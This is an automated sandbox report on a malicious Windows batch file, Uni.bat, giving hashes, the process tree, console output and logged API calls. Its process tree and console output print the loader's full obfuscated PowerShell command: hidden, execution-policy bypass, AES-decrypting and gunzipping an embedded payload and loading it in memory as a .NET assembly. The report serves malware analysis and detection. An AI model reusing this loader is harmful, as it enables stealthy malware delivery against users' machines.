Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 18, 2023, 6:27 p.m.	July 18, 2023, 6:30 p.m.

Size	12.6MB
Type	DOS batch file, ASCII text, with very long lines, with CRLF line terminators
MD5	`488a8bd72bd92554832ec260181e949b`
SHA256	`a5158b467cd4fcb6167f067dccc92bde8a850a486cdb4e29283bf755ab4566f5`
CRC32	`85E505E6`
ssdeep	`49152:Lp2NpugSn0aCmtTHe6yNf0PlKAKLngb17yEo8bb8dSNMPOVnUvso+0L9zaTsGbxk:O`
Yara	None matched

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "uqVveyC" C:\Users\test22\AppData\Local\Temp\Uni.bat
3060
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Uni.bat
  2200
  - net.exe net session
    296
    - net1.exe C:\Windows\system32\net1 session
      2428
  - Uni.bat.exe "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function oDKRN($UCbcn){ $EBBsx=[System.Security.Cryptography.Aes]::Create(); $EBBsx.Mode=[System.Security.Cryptography.CipherMode]::CBC; $EBBsx.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $EBBsx.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jU/PZ5sGVHXe9eukENZ+EwRCKiahiZSWvpUTt8Zb8+E='); $EBBsx.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ub/nVYqjjldEJpQEkssoQQ=='); $RKtfb=$EBBsx.CreateDecryptor(); $return_var=$RKtfb.TransformFinalBlock($UCbcn, 0, $UCbcn.Length); $RKtfb.Dispose(); $EBBsx.Dispose(); $return_var;}function FeGSU($UCbcn){ $REgbO=New-Object System.IO.MemoryStream(,$UCbcn); $lpRdy=New-Object System.IO.MemoryStream; $NYxVA=New-Object System.IO.Compression.GZipStream($REgbO, [IO.Compression.CompressionMode]::Decompress); $NYxVA.CopyTo($lpRdy); $NYxVA.Dispose(); $REgbO.Dispose(); $lpRdy.Dispose(); $lpRdy.ToArray();}function aYwhj($UCbcn,$qsjlD){ $CQLXX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$UCbcn); $ROSPE=$CQLXX.EntryPoint; $ROSPE.Invoke($null, $qsjlD);}$wetzf=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\test22\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($CnUAr in $wetzf) { if ($CnUAr.StartsWith('SEROXEN')) { $aMomv=$CnUAr.Substring(7); break; }}$dMqwU=[string[]]$aMomv.Split('\');$IoPPi=FeGSU (oDKRN ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($dMqwU[0])));$vOmrC=FeGSU (oDKRN ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($dMqwU[1])));aYwhj $vOmrC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));aYwhj $IoPPi (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
    1196

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA July 18, 2023, 6:28 p.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW July 18, 2023, 6:28 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 18, 2023, 6:28 p.m.			0	0

Command line console output was observed (32 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW July 18, 2023, 6:27 p.m.	buffer: System error 1726 has occurred. console_handle: 0x0000000b	1	1
WriteConsoleW July 18, 2023, 6:27 p.m.	buffer: The remote procedure call failed. console_handle: 0x0000000b	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: Unexpected token '(' in expression or statement. console_handle: 0x00000023	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: At line:1 char:272 console_handle: 0x0000002f	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: + function oDKRN($UCbcn){ $EBBsx=[System.Security.Cryptography.Aes]::Create(); console_handle: 0x0000003b	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: $EBBsx.Mode=[System.Security.Cryptography.CipherMode]::CBC; $EBBsx.Padding=[Sys console_handle: 0x00000047	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: tem.Security.Cryptography.PaddingMode]::PKCS7; $EBBsx.Key=[System.Convert]::('g console_handle: 0x00000053	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: nirtS46esaBmorF'[-1..-16] -join '')( <<<< 'jU/PZ5sGVHXe9eukENZ+EwRCKiahiZSWvpUT console_handle: 0x0000005f	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: t8Zb8+E='); $EBBsx.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')( console_handle: 0x0000006b	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: 'Ub/nVYqjjldEJpQEkssoQQ=='); $RKtfb=$EBBsx.CreateDecryptor(); $return_var=$RKtf console_handle: 0x00000077	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: b.TransformFinalBlock($UCbcn, 0, $UCbcn.Length); $RKtfb.Dispose(); $EBBsx.Dispo console_handle: 0x00000083	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: se(); $return_var;}function FeGSU($UCbcn){ $REgbO=New-Object System.IO.MemorySt console_handle: 0x0000008f	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: ream(,$UCbcn); $lpRdy=New-Object System.IO.MemoryStream; $NYxVA=New-Object Syst console_handle: 0x0000009b	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: em.IO.Compression.GZipStream($REgbO, [IO.Compression.CompressionMode]::Decompre console_handle: 0x000000a7	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: ss); $NYxVA.CopyTo($lpRdy); $NYxVA.Dispose(); $REgbO.Dispose(); $lpRdy.Dispose( console_handle: 0x000000b3	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: ); $lpRdy.ToArray();}function aYwhj($UCbcn,$qsjlD){ $CQLXX=[System.Reflection.A console_handle: 0x000000bf	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: ssembly]::('daoL'[-1..-4] -join '')([byte[]]$UCbcn); $ROSPE=$CQLXX.EntryPoint; console_handle: 0x000000cb	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: $ROSPE.Invoke($null, $qsjlD);}$wetzf=[System.IO.File]::('txeTllAdaeR'[-1..-11] console_handle: 0x000000d7	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: -join '')('C:\Users\test22\AppData\Local\Temp\Uni.bat').Split([Environment]::Ne console_handle: 0x000000e3	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: wLine);foreach ($CnUAr in $wetzf) { if ($CnUAr.StartsWith('SEROXEN')) { $aMomv= console_handle: 0x000000ef	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: $CnUAr.Substring(7); break; }}$dMqwU=[string[]]$aMomv.Split('\');$IoPPi=FeGSU ( console_handle: 0x000000fb	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: oDKRN ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($dMqwU[0])));$vOmrC=Fe console_handle: 0x00000107	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: GSU (oDKRN ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($dMqwU[1])));aYwh console_handle: 0x00000113	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: j $vOmrC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK' console_handle: 0x0000011f	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: , 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));aYwhj $IoPPi (,[string console_handle: 0x0000012b	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: []] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEde console_handle: 0x00000137	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: YOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN')); console_handle: 0x00000143	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: + CategoryInfo : ParserError: ((:String) [], ParentContainsErrorR console_handle: 0x0000014f	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: ecordException console_handle: 0x0000015b	1	1
WriteConsoleW July 18, 2023, 6:28 p.m.	buffer: + FullyQualifiedErrorId : UnexpectedToken console_handle: 0x00000167	1	1

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617fb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006184b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006184b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006184b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617b30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617b30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617b30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617b30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617b30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617b30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006182b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006182b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006182b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617c30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617730 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00617df0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00618530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00618530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00618530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00618530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00618530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 18, 2023, 6:28 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00618530 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 18, 2023, 6:27 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 140 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 1245184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02850000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02940000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ab1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0200a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ab2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02002000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02941000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02942000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0238a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02013000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02014000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0239b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02397000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0200b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02382000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02395000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02015000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0238c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02016000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0239c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02383000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02384000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02385000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02386000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02387000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02388000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02389000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
